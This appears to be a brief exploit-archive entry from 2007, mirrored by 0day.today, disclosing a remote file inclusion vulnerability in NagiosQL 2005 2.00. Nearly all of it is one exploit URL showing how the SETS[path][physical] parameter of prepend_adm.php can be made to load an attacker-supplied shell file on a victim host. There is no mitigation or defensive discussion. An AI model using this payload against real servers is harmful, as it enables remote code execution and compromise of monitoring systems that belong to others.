id: 1872
date: 05/13/2007
title: NagiosQL 2005 2.00 (prepend_adm.php) Remote File Inclusion Vuln
author: ThE TiGeR
cves: 

===============================================================
NagiosQL 2005 2.00 (prepend_adm.php) Remote File Inclusion Vuln
===============================================================



#NagiosQL Remote file inclusion

#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz

#Exploit :

#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?

#Discovered by ThE TiGeR



#  0day.today [2023-03-26]  #